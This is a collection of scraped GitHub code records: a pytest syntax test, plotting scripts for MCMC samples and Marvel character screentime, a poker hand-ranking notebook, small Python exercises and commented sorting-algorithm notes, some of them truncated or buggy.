pytest.raises(ForsetiSyntaxError):\n\t\tcheck_syntax(condition)\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"SomeCommand OR SomeCondition (Wrong condition)\",\n\t\t\"(Wrong condition) SomeCommand OR SomeCondition\",\n\t\t\"SomeCommand (Wrong condition) SomeCondition\",\n\t]\n)\ndef 
test_check_staples_without_operators(condition):\n\twith pytest.raises(ForsetiSyntaxError, match=\"You can't use staples without operators\"):\n\t\tcheck_syntax(condition)\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"SomeCommand1 OR NOT SomeCommand2\",\n\t\t\"SomeCommand1 NOT NOT SomeCommand2\",\n\t\t\"SomeCommand1 NOT SomeCommand2\",\n\t]\n)\ndef test_check_not_without_and_errors(condition):\n\twith pytest.raises(ForsetiSyntaxError, match=\"Operator 'NOT' cannot be used without operator 'AND'\"):\n\t\tcheck_syntax(condition)\n","repo_name":"Kirill-Lekhov/forseti_lang","sub_path":"forseti_lang/checkers/syntax_test.py","file_name":"syntax_test.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15075404095","text":"# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plotGraphs():\n\n    # Set Number of Samples\n    totSamples = 20000\n    levels = np.array([0.0,0.01,0.2,0.4,0.6])\n\n    # Read MCMC Sample Data\n    data1 = np.loadtxt('paramTraces_10.txt',skiprows=1)\n    data1 = data1[:totSamples,2:]\n    data2 = np.loadtxt('paramTraces_11.txt',skiprows=1)\n    data2 = data2[:totSamples,2:]\n    data3 = np.loadtxt('paramTraces_12.txt',skiprows=1)\n    data3 = data3[:totSamples,2:]\n\n    # Read Optimal Points\n    opt1 = np.loadtxt('OptimalPoints_10.txt')\n    opt2 = np.loadtxt('OptimalPoints_11.txt')\n    opt3 = np.loadtxt('OptimalPoints_12.txt')\n\n    # Create Exact Surfaces\n    delta = 0.025\n    x = np.arange(-3.0, 3.0, delta)\n    y = np.arange(-3.0, 3.0, delta)\n    X, Y = np.meshgrid(x, y)\n    Z1 = Y**2 + X**2*(X-1.0)*(X-2.0)\n    Z2 = Y**2 - X**2*(X+1.0)\n    t1 = np.arange(0.0, 2.0*np.pi, delta)\n    t2 = np.arange(0.0, 2.0*np.pi, delta)\n    T1, T2 = np.meshgrid(t1, t2)\n    Z3 = np.abs(1.0/12.0 - 1.0/3.0*(np.sin(T1-T2)+np.sin(T1-0))) + np.abs(-1.0/12.0-1.0/3.0*(np.sin(T2-T1)+np.sin(T2-0.0)))\n\n    plt.figure(figsize=(8,6))\n    ax = plt.subplot(2,3,1)\n    ax.plot(data1[:,0],data1[:,1],'bo',markersize=1,alpha=0.5)\n    ax.contour(X, Y, Z1, levels)\n    ax.set_title('First Curve')\n    ax.set_xlim([-3.0,3.0])\n    ax.set_ylim([-3.0,3.0])\n\n    ax = plt.subplot(2,3,2)\n    ax.plot(data2[:,0],data2[:,1],'bo',markersize=1,alpha=0.5)\n    ax.contour(X, Y, Z2, levels)\n    ax.set_title('Alpha Curve')\n    ax.set_xlim([-3.0,3.0])\n    ax.set_ylim([-3.0,3.0])\n\n    ax = plt.subplot(2,3,3)\n    ax.plot(data3[:,0],data3[:,1],'bo',markersize=1,alpha=0.5)\n    ax.contour(t1, t2, Z3, levels)\n    ax.set_title('Kuramoto')\n    ax.set_xlim([0,2*np.pi])\n    ax.set_ylim([0,2*np.pi])\n\n    ax = plt.subplot(2,3,4)\n    ax.plot(opt1[:,0],opt1[:,1],'ro',markersize=4,alpha=0.6)\n    ax.contour(X, Y, Z1, levels)\n    ax.set_xlim([-3.0,3.0])\n    ax.set_ylim([-3.0,3.0])\n\n    ax = plt.subplot(2,3,5)\n    ax.plot(opt2[:,0],opt2[:,1],'ro',markersize=4,alpha=0.6)\n    ax.contour(X, Y, Z2, levels)\n    ax.set_xlim([-3.0,3.0])\n    ax.set_ylim([-3.0,3.0])\n\n    ax = plt.subplot(2,3,6)\n    ax.plot(opt3[:,0],opt3[:,1],'ro',markersize=4,alpha=0.6)\n    ax.contour(t1, t2, Z3, levels)\n    ax.set_xlim([0,2*np.pi])\n    ax.set_ylim([0,2*np.pi])\n\n    plt.tight_layout()\n    plt.savefig('sample_Distribution.pdf')\n    # plt.show()\n\n# =============\n# MAIN FUNCTION\n# =============\nif __name__ == \"__main__\":\n    plotGraphs()","repo_name":"desResLab/tulip","sub_path":"test/pyTests/02_MCMC/showPoints2D.py","file_name":"showPoints2D.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41782829684","text":"import regex as re\nimport sys\nimport os\nimport getopt\n\nfile 
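= None  # placeholder; rebound to the real handle just below\n# Illustrative sketch (not part of the original script): the same\n# open/iterate pattern with context managers, so both files close even\n# on errors. START_TAG, END_TAG, in_path and out_path are hypothetical\n# names, not identifiers from this repository:\n#\n# with open(in_path) as src, open(out_path, 'w') as dst:\n#     sentence = []\n#     for line in src:\n#         if re.match(START_TAG, line):\n#             sentence = []\n#         elif re.match(END_TAG, line):\n#             dst.write(' '.join(sentence) + '\\n')\n#         else:\n#             sentence.append(line.strip())\nfile 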
= open(sys.argv[1])\nficheiro_atual = open(\"tagged/tagged.tagged\",'w')\nfrase_atual = []\nfrase = False\n\nfor line in file.readlines():\n match = re.match(r'$',line)\n # if match:\n # file_name = match[1]+ '-' + match[2]+ '-'+match[3]+'.tagged'\n # ficheiro_atual = open('tagged/'+file_name,'w')\n # ficheiro_atual.write('\\n')\n # continue\n\n if re.match(r'',line):\n frase_atual = []\n frase = True\n continue\n\n if re.match(r'',line):\n frase = False\n ficheiro_atual.write(' '.join(frase_atual) + '\\n')\n continue\n\n # if re.match(r'',line):\n # ficheiro_atual.close()\n # continue\n\n if re.match(r' SF_rank: # Look if the actual card is greater than the previous\n SF_rank = max(rank, SF_rank) # If it is, make it the highest rank up to now\n SF_hand = this_hand # Assign it's card to the straight flush hand\n \n elif kind(4,rank): \n \"Then check for Four of a Kind\"\n if rank > best_4_rank:\n k4_hand = [card for card in this_hand if '--23456789TJQKA'[kind(4,rank)] in card]\n k4_hand = k4_hand + [card for card in this_hand if '--23456789TJQKA'[kind(4,rank)] not in card]\n best_4_rank = max(best_4_rank, rank)\n FK_hand = list(k4_hand)\n \n elif kind(3, rank) and kind(2, rank):\n if rank > FH_ranks:\n FH_ranks = max(rank, FH_ranks)\n k2_cards = [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] in card]\n k3_cards = [card for card in this_hand if '--23456789TJQKA'[kind(3,rank)] in card]\n FH_hand = k2_cards + k3_cards\n \n elif flush(this_hand):\n \"Check for the flushs in the cards\"\n if flush(this_hand):\n if rank > FL_rank:\n FL_rank = max(rank, FL_rank)\n FL_hand = list(this_hand)\n \n elif straight(rank):\n if rank > ST_rank:\n ST_rank = max(rank, FL_rank)\n ST_hand = list(this_hand)\n \n elif kind(3, rank):\n if rank > K3_rank:\n K3_rank = max(rank, K3_rank)\n K3_hand = list(this_hand)\n \n elif two_pair(rank):\n if rank > TP_rank:\n TP_rank = max(rank, TP_rank)\n TP_hand = [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[0]] in card]\n TP_hand = TP_hand + [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[1]] in card]\n TP_hand = TP_hand + [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[0]] not in card and '--23456789TJQKA'[two_pair(rank)[1]] not in card]\n \n elif kind(2, rank):\n if rank > pair_rank:\n pair_rank = max(rank, pair_rank)\n pair_hand = [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] in card]\n pair_hand = pair_hand + [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] not in card]\n else:\n if rank > HC_rank:\n HC_rank = max(rank, pair_rank)\n HC_card_hand = list(this_hand)\n \n \"Return values in order of importance if they are assigned\"\n if SF_hand:\n return SF_hand\n elif FK_hand:\n return FK_hand\n elif FH_hand:\n return FH_hand\n elif FL_hand:\n return FL_hand\n elif ST_hand:\n return ST_hand\n elif K3_hand:\n return K3_hand\n elif TP_hand:\n return TP_hand\n elif pair_card:\n return pair_card\n else:\n return HC_hand\n \n \n# ------------------\n# Provided Functions\n# \n# You may want to use some of the functions which\n# you have already defined in the unit to write \n# your best_hand function.\n\n\n# In[4]:\n\n\ndef best_hand(hand):\n \"From a 7-card hand, return the best 5 card hand.\"\n return max(itertools.combinations(hand, 5), key=hand_rank)\n\n\n# In[5]:\n\n\nprint(test_best_hand())\n\n\n# ## With Jokers\n\n# The card '?B' is the black joker and can only be replaced with a black card\n# The card '?R' is the red joker and can only be replaced with a red card\n\n# 
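Illustrative sketch (not the notebook's own code): one way to expand\n# jokers is to try every legal replacement per card and then rank all the\n# resulting hands; 'expand' and the two card lists are hypothetical names.\n#\n# red_cards = [r + s for r in '23456789TJQKA' for s in 'HD']\n# black_cards = [r + s for r in '23456789TJQKA' for s in 'SC']\n#\n# def expand(hand):\n#     options = [red_cards if c == '?R'\n#                else black_cards if c == '?B'\n#                else [c] for c in hand]\n#     return itertools.product(*options)\n\n# 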
In[8]:\n\n\ndef best_wild_hand(hand):\n \"Try all values for jokers in all 5-card selections.\"\n \n hand = [card if card != '?R' else r+s for r in '23456789TJQKA' for s in 'HD' for card in hand ]\n hand = [card if card != '?B' else r+s for r in '23456789TJQKA' for s in 'SC' for card in hand ]\n def chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n hands = [hand for hand in chunks(hand, 7)]\n all_max = []\n for hand in hands:\n all_max.append(max(itertools.combinations(hand, 5), key=hand_rank))\n\n return max(all_max, key=hand_rank)\n\n\ndef test_best_wild_hand():\n assert (sorted(best_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split()))\n == ['7C', '8C', '9C', 'JC', 'TC'])\n assert (sorted(best_wild_hand(\"TD TC 5H 5C 7C ?R ?B\".split()))\n == ['7C', 'TC', 'TD', 'TH', 'TS'])\n assert (sorted(best_wild_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n return 'test_best_wild_hand passes'\n\n# ------------------\n# Provided Functions\n# \n# You may want to use some of the functions which\n# you have already defined in the unit to write \n# your best_hand function.\n\ndef hand_rank(hand):\n \"Return a value indicating the ranking of a hand.\"\n ranks = card_ranks(hand) \n if straight(ranks) and flush(hand):\n return (8, max(ranks))\n elif kind(4, ranks):\n return (7, kind(4, ranks), kind(1, ranks))\n elif kind(3, ranks) and kind(2, ranks):\n return (6, kind(3, ranks), kind(2, ranks))\n elif flush(hand):\n return (5, ranks)\n elif straight(ranks):\n return (4, max(ranks))\n elif kind(3, ranks):\n return (3, kind(3, ranks), ranks)\n elif two_pair(ranks):\n return (2, two_pair(ranks), ranks)\n elif kind(2, ranks):\n return (1, kind(2, ranks), ranks)\n else:\n return (0, ranks)\n \ndef card_ranks(hand):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = ['--23456789TJQKA'.index(r) for r, s in hand]\n ranks.sort(reverse = True)\n return [5, 4, 3, 2, 1] if (ranks == [14, 5, 4, 3, 2]) else ranks\n\ndef flush(hand):\n \"Return True if all the cards have the same suit.\"\n suits = [s for r,s in hand]\n return len(set(suits)) == 1\n\ndef straight(ranks):\n \"\"\"Return True if the ordered \n ranks form a 5-card straight.\"\"\"\n return (max(ranks)-min(ranks) == 4) and len(set(ranks)) == 5\n\ndef kind(n, ranks):\n \"\"\"Return the first rank that this hand has \n exactly n-of-a-kind of. 
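(e.g. for sorted ranks [14, 14, 7, 7, 5], kind(2, ranks) is 14,\n    the first pair scanned, while kind(3, ranks) is None.)\n    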
Return None if there \n is no n-of-a-kind in the hand.\"\"\"\n for r in ranks:\n if ranks.count(r) == n: return r\n return None\n\ndef two_pair(ranks):\n \"\"\"If there are two pair here, return the two \n ranks of the two pairs, else None.\"\"\"\n pair = kind(2, ranks)\n lowpair = kind(2, list(reversed(ranks)))\n if pair and lowpair != pair:\n return (pair, lowpair)\n else:\n return None \n\n\n# In[48]:\n\n\ntest_best_wild_hand()\n\n\n# In[103]:\n\n\nbest_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split())\n\n\n# In[102]:\n\n\nbest_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split())\n\n","repo_name":"SakaRicky/Design_of_computer_programs","sub_path":"PS1 .py","file_name":"PS1 .py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"44504087594","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mt\nimport sys\n# Screentime data from .csv\n\ndef load_screen(filename='~/Desktop/Comics/codes/cap.csv'):\n\t'''Load .csv of screentimes to pandas dataframe'''\n\tdf=pd.read_csv(filename,index_col=0)\n\treturn df\n\ndef to_times(df,skipcol=0,skiprow=0):\n\t'''Converts df values to timedelta objects'''\n\treturn df.iloc[skiprow:,skipcol:].apply(pd.to_timedelta)\n\ndef load_csv(filename='~/Desktop/Comics/codes/cap.csv'):\n\tdf1=load_screen()\n\tdf=to_times(df1,skipcol=3,skiprow=2)\n\treturn df1, df\n\ndef series(df1, subset=None, level=0):\n\tdf2=df1.drop('Runtime')\n\n\tif subset==None: # this is for the whole MCU\n\t\tdf=to_times(df2,skipcol=3,skiprow=2)\n\t\tc_run=df.sum(axis=1)\n\t\tc_series=c_run.sort_values(ascending=False)\n\t\tfilm_num=1\n\t\tmax_time=None\n\t\n\telse: #select subset group\t\n\t\tdf2=df2.T.set_index('Group',append=True).T # sets Group row as an index\n\t\tp=df2.xs(subset,axis=1,level=1)\n\t\tfilm_num=len(p.columns)\n\t\tp=to_times(p,skiprow=1)\n\t\tmax_time=pd.to_numeric(p.max())\n\t\tc_series=p[p.columns[level]].sort_values(ascending=False)\n\treturn c_series, (film_num,max_time)\n\ndef series_all(df1, subset='Thor'):\n\tdf2=df1.drop('Runtime')\n\tdf2=df2.T.set_index('Group',append=True).T # sets Group row as an index\n\tp=df2.xs(subset,axis=1,level=1)\n\tfilm_num=len(p.columns)\n\tp=to_times(p,skiprow=1)\n\tmax_time=pd.to_numeric(p.max())\n\tr=p.sum(axis=1)\n\tc_series=r.sort_values(ascending=False)\n\n\treturn c_series\n\ndef trip_plot(df1, subset='Thor',num_chars=6,units='min',colors=None, fig_num=1):\n\tc_series,(film_num,max_time)=series(df1,subset=subset,level=0)\n\t\n\truns=[]\n\tfor a in range(0,film_num):\n\t\tb,c=series(df1,subset=subset,level=a)\n\t\truns.append(b)\n\t\n\truns=runs[::-1] # so chronologically\n\n\tif units=='hrs':\n\t\tun=3600.*1E9\n\telse:\n\t\tun=60.*1E9\n\n\t# Need this to determine consistent y-scale across plots\n\tmax_time=max_time.max()/un\n\tmax_time=(np.floor(max_time/10)+1)*10\n\n\t# plots\n\tfig=plt.figure(fig_num,figsize=(9,4))\n\tfor a in range(0,film_num):\n\t\ts=plt.subplot(1,film_num,a+1)\n\t\t\t\t\n\t\tbars=runs[a].index[:num_chars]\n\t\theights=pd.to_numeric(runs[a].values[:num_chars])/un #timedelta to minutes\n\t\typos=np.arange(len(bars))\n\t\t\n\t\t# get colors\n\t\tvill=df1['Colors'].to_dict()\n\t\tvills=[vill[x] for x in bars]\t\t\n\n\t\tplt.title(runs[a].name)\t\n\t\tplt.bar(ypos, heights,color=vills)\n\t\tplt.xticks(ypos, bars, rotation=45)\n\t\t#plt.ylim(ymax=max_time)\n\t\tplt.ylim(ymax=80) # same scale for everyone\n\t\tplt.ylabel('Screentime 
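(min)')  # provisional label; the unit-aware one right below wins\n\t\t# Note on the conversion above (added observation, not original\n\t\t# commentary): pd.to_numeric() turns timedeltas into nanoseconds,\n\t\t# which is why 'un' is 60*1e9 for minutes and 3600*1e9 for hours.\n\t\tplt.ylabel('Screentime 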
('+units+')')\n\t\t\n\t\ts.spines['right'].set_visible(False)\n\t\ts.spines['top'].set_visible(False)\n\t\t# make axes invisible\n\t\tif a>0:\n\t\t\ts.yaxis.set_visible(False)\n\t\t\ts.spines['left'].set_visible(False)\n\tplt.subplots_adjust(bottom=0.2,wspace=0.1)\n\t#plt.show()\n\n\treturn runs\n\ndef plot_screentimes(c_series,subset=None, movie=None, num_chars=6,colors=None, units='min'):\n\t'''Bar plot of Screentimes for characters.'''\n\tif units=='hrs':\n\t\tun=3600.*1E9\n\telse:\n\t\tun=60.*1E9\n\tplt.figure(figsize=(9,4))\n\tc=plt.subplot(1,1,1)\n\tbars=c_series.index[:num_chars]\n\theights=pd.to_numeric(c_series.values[:num_chars])/un #timedelta to minutes\n\typos=np.arange(len(bars))\n\n\t\t\n\tvill=df1['Colors'].to_dict()\n\tvills=[vill[x] for x in bars]\t\t\n\tplt.bar(ypos, heights,color=vills)\n\tplt.xticks(ypos, bars, rotation=45)\n\tplt.ylabel('Screentime ('+units+')')\n\tplt.subplots_adjust(bottom=0.3)\n\tc.spines['right'].set_visible(False)\n\tc.spines['top'].set_visible(False)\t\n\t#plt.show()\n\treturn None\n\ndef plot_percents(c_series,subset=None, movie=None, num_chars=6,colors=None, units='min'):\n\t'''Bar plot of Screentimes for characters in percentage of total screentime.'''\n\tplt.figure(figsize=(9,4))\n\tc=plt.subplot(1,1,1)\n\tc_series=c_series.sort_values(ascending=False)\n\tbars=c_series.index[:num_chars]\n\theights=pd.to_numeric(c_series.values[:num_chars]) #timedelta to minutes\n\typos=np.arange(len(bars))\n\tvill=df1['Colors'].to_dict()\n\tvills=[vill[x] for x in bars]\t\t\n\tplt.bar(ypos, heights,color=vills)\n\tplt.xticks(ypos, bars, rotation=45)\n\tplt.ylabel('Screentime Percentage (%)')\n\t#plt.ylim(ymax=60)\n\tplt.subplots_adjust(bottom=0.3)\n\tc.spines['right'].set_visible(False)\n\tc.spines['top'].set_visible(False)\t\n\t#plt.show()\n\treturn None\n#--------------------\n# Main Stuff\n#------------------\n\ndf1, df=load_csv()\n\n# Add colour column\ncolor_dict={'V':'k','G':'0.5','Stark':'#b60000', 'Cap':'#002ea5', 'Avengers':'#3f829d', 'IM':'#b60000', 'CA':'#002ea5','Thor':'#0691f3', 'GotG':'#307b1c', 'Team':'b','AM':'cyan','Hulk':'g','Next':'magenta','Strange':'gold','Parker':'#980002','BP':'#380282','Marvel':'darkgreen','Ant':'cyan'}\n\nd=df1[['Affiliation','Alignment']]\nd=d[3:]\ncs=[]\nfor a in d.values:\n\tif a[1]=='V':\n\t\tcs.append('k')\n\telif a[1]=='G':\n\t\tcs.append('0.75')\n\telse:\n\t\tcs.append(color_dict[a[0]])\n\n# Make a colour column\ndf1['Colors']=[None]*3+cs\ncols=df1.columns.tolist()\ncols=cols[:2]+[cols[-1]]+cols[2:-1]\ndf1=df1[cols]\n\n# Total runtimes by group\nruns=df1.loc[['Group','Runtime']].T\nruns['Runtime']=runs['Runtime'].apply(pd.to_timedelta)\nruns_tot=runs.groupby('Group').sum()\ntots=runs_tot.to_dict()['Runtime']\n#-------------\n# Plots\n#-------------\n\n# by group\nun_groups=df1.loc['Group'].unique()[2:]\n\nfor num, group in enumerate(un_groups):\n\t# lets make these percentages\n\ttot=tots[group]\n\tj=trip_plot(df1,subset=group,fig_num=num)\n\t#p=series_all(df1,subset=group)/tot*100\n\t#r=plot_percents(p)\n\n# in total\nc_series,x=series(df1)\nc=plot_screentimes(c_series,num_chars=10,colors='k',units='hrs')\n\nplt.show()\n","repo_name":"kimikovader/comic_db","sub_path":"screentime.py","file_name":"screentime.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14964118792","text":"fact = lambda num: 1 if num == 0 else num * fact(num - 1)\n\nseries = lambda n, x: sum([(n ** i) / fact(i) for i in range(x + 
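1)])\n# Worked note (an assumption about intent): series(n, x) is the Maclaurin\n# partial sum of e**n over terms i = 0..x, so series(1.0, 10) already\n# approximates math.e to roughly 7 decimal places.\nseries = lambda n, x: sum([(n ** i) / fact(i) for i in range(x + 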
1)])\n\nn = float(input(\"Enter the value of n: \"))\nx = int(input(\"Enter the value of x: \"))\n\nresult = series(n, x)\n\nprint(\"Result:\", result)\n\nresult = 0\n\n\ndef calculate_sum(n):\n\n    global result\n    if n == 0:\n        return\n\n    calculate_sum(n - 1)\n    result += ((-1) ** (n + 1)) / n\n\n\n\ncalculate_sum(int(n))  # the recursion needs an integer depth; a non-integral float would never reach 0\n\n\nprint(\"Result:\", result)","repo_name":"abdullahc12/Lab6ph","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18135225373","text":"class Cat:\n    def __init__(self, input_name, input_breed, input_is_cuddly, input_age=0):\n        self.name = input_name\n        self.breed = input_breed\n        self.age = input_age\n        self.is_cuddly = input_is_cuddly\n        self.friends = []\n    \n    def cuddly_cats(self, other_cat):\n        if (other_cat.is_cuddly):\n            self.friends.append(other_cat)\n            print(f\"{other_cat.name} is {self.name}'s friend and it loves cuddling.\")\n        else:\n            print(f\"{other_cat.name} doesn't like cuddling very much.\")\n\n    def __repr__(self):\n        if len(self.friends) != 1:\n            return f\"{self.name} is a {self.breed} and it's {self.age} years old. It has {len(self.friends)} friends.\"\n        else:\n            return f\"{self.name} is a {self.breed} and it's {self.age} years old. It has {len(self.friends)} friend.\"\n\ncat_zero = Cat(\"Kitty\", \"Persian\", True, 16)\ncat_one = Cat(\"Kito\", \"Tabby\", False, 2)\ncat_two = Cat(\"Tiko\", \"Ginger domestic cat\", True, 0)\n\ncat_zero.cuddly_cats(cat_one)\ncat_one.cuddly_cats(cat_zero)\ncat_zero.cuddly_cats(cat_two)\nprint(\"....................\")\nprint(cat_zero)\nprint(cat_one)\nprint(cat_two)\n\n\n","repo_name":"prisalcalde/Python-exercises","sub_path":"Cats.py","file_name":"Cats.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"39333348076","text":"class Hashable(type):\n    def __new__(cls,name,base,dct):\n        if \"__hash__\" not in dct:\n            dct[\"__hash__\"] = lambda x: hash(id(x))\n        new_class = super().__new__(cls,name,base,dct) \n        return new_class\n\nclass hashable_list(list,metaclass = Hashable):\n    def __init__(self,*args,**kwargs):\n        super().__init__(*args,**kwargs)\n\ntest = hashable_list([1,2,3,4,5])\nprint(test)\nprint(test.__hash__)\nprint(hash(test))\n","repo_name":"imgomez0127/daily-programming","sub_path":"randomCode/hashable.py","file_name":"hashable.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3834015259","text":"# In the name of God; prayers and peace be upon all the prophets and messengers, their pure households, and those who follow them in goodness until the Day of Judgment\r\n# ◙◙ (α) Merge Sort Algorithm\r\ncount = 0\r\n\r\nlst = [4,6,8,1,3,2,5,7]\r\nsectorA = lst[0:4]\r\nsectorB = lst[4:8]\r\n\r\n# ◘◘@Note: to allocate the size of the array before initialisation.\r\n#sortedArray = [][:5]\r\nsortedArray = []\r\ncount = 0\r\n\r\n\r\n# ◘◘@Note: to print the entire array elements without a for loop.\r\n'''print(*sectorA,sep =\"\\n\")\r\nprint('\\n'.join(map(str, sectorA)))'''\r\n\r\n\r\n\r\n'''for i in range(1):\r\n    if (sectorA[-1] < sectorA[0] and sectorA[-1] < sectorA[1] and sectorA[-1] < sectorA[2]):\r\n        sortedArray.append(sectorA[-1])\r\n    if(sectorA[0] < sectorA[1] and sectorA[0] < sectorA[2] ):\r\n        sortedArray.append(sectorA[0])\r\n    if(sectorA[1] < sectorA[2]):\r\n        sortedArray.append(sectorA[1])\r\n        
sortedArray.append(sectorA[2])\r\n'''\r\n\r\n'''for i in sectorA:\r\n if(sectorA[-1] < i):\r\n sortedArray.append(sectorA[-1])\r\n if(sectorA[0] < i):\r\n sortedArray.append(sectorA[0])\r\n if (sectorA[1] < i):\r\n sortedArray.append(sectorA[1])\r\n sortedArray.append(sectorA[2])\r\n'''\r\n\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n# ◙◙ {Select Sorting Algorithms}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n#◘◘@Note: to sort a list we need firstly to set the minimum number {declare a new variable} as the first index on the list; either it is the minimum or not, \r\n# then compare that number with the rest numbers on the list, after getting the {real minimum number}, set it to be the first index on the list.\r\n\r\nunsortedLst = [7,11,8,1,4,2,3,9,12,10]\r\nfor i in range(len(unsortedLst)):\r\n \r\n # Find the minimum element in remaining \r\n # unsorted array\r\n\r\n min_number = i\r\n\r\n for j in range(i+1, len(unsortedLst)):\r\n\r\n\r\n if unsortedLst[min_number] > unsortedLst[j]:\r\n\r\n\r\n min_number = j\r\n\r\n\r\n # Swap the found minimum element with \r\n # the first element \r\n \r\n unsortedLst[i], unsortedLst[min_number] = unsortedLst[min_number], unsortedLst[i]\r\n\r\n'''print(unsortedLst)'''\r\n\t\r\n# ◘◘Select Sorting Algorithm illustration;\r\n'''\r\n ◘ for i in range (11):\r\n min_number = 0\r\n \r\n for j in range(1,11):\r\n if (unsortedLst[0] > unsortedLst[1]):\r\n min_number = 1\r\n \r\n ▬# Then Swapping indices, The min_number will get in-place\r\n of the higher_number; That process will continuosly occured till\r\n the array got arranged.\r\n'''\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n# ◙◙ {Bubble Sorting Algorithms}\r\n#───────────────────���───────────────────────────────────────────────────────────────\r\ndef bubbleSort(array):\r\n n = len(array)\r\n\r\n for i in range(n-1): # ◘◘ {n-1} because the last element has the index No. [(len(array)-1)]. \r\n for j in range(0,n-i-1):\r\n if (array[j] > array[j+1]):\r\n array[j], array[j+1] = array[j+1], array[j]\r\n return array\r\n '''\r\n # ◘◘Illustration: ▬ On first iteration\r\n for i in range(7):\r\n for j in range(0,6): # On first iteration i = 0\r\n if (array[1] > array[2]): # ▬ if True > then swap the indices values.\r\n array[1], array[2] = array[2],array[1]\r\n '''\r\n'''print(bubbleSort([1,3,4,5,8,6,7,2]))'''\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n\r\n# ◙◙ {Insertion Sorting Algorithms}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n\r\nL = [4,5,8,9,2,1,3,7,6]\r\nfor i in range(1,len(L)):\r\n k = L[i]\r\n j = i - 1\r\n while (j >= 0 and L[j] > k):\r\n L[j+1] = L[j]\r\n j = j - 1\r\n L[j+1] = k\r\n\r\n'''Algorithm Analysis'''\r\n'''k = L[0]\r\nj = 0'''\r\n# if {Ture} then looping \r\n'''while (1 >= 0 and 4 > 5):\r\n L[2] = L[1]\r\n j = 0 '''\r\n# if False then keep it in its index.\r\n'''L[j+1] = k ◘◘ As {j+1 = 1}\r\n'''\r\n\r\n# ◘ get the integer value of division. » use (//) ▬ for example: {//2}. 
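 (floor division)\r\n# Worked example (added, not original commentary): 7 // 2 == 3 and\r\n# -7 // 2 == -4, because // always rounds toward negative infinity.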
\r\n'''print(len(L) //2)'''\r\n\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n\r\n# ◙◙ {Merge Sort Algorithm}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n# ◘ To define this Algorithm we need to pass through some steps:\r\n# ○ α) Divide the main array by its length for sub-arrays.\r\n# ○ ß) Sorting elements.\r\n# ○ Γ) Merging elements in sub-arrays; finally merge sub-arrays to the final form of array. \r\ndef mergeSort(array):\r\n if (len(array) > 1):\r\n mid_length = len(array) //2 # ◘ Get the integer number of the length.\r\n \r\n # ◙ Dividing the main array to (2) sectors {Right -- Left}..\r\n L = array[:mid_length]\r\n\r\n R = array[mid_length:]\r\n\r\n # Then Sorting The Right and Left sector Separately.\r\n\r\n # ◘◘ The Passed array will be divided till reaching out one element of each array to be compared with.\r\n mergeSort(L)\r\n\r\n mergeSort(R)\r\n\r\n i = j = k = 0\r\n \r\n\r\n # ◘ Loop till the reaching the length of both arrays and copying the main array elements\r\n # on both sub-arrays.\r\n\r\n # »» On this step: Dividing the main array to {2 arrays}; while one of these arrays\r\n # will contain the smaller valued elements and the other will contain the higher valued elements.\r\n \r\n while i < len(L) and j < len(R):\r\n # ○ 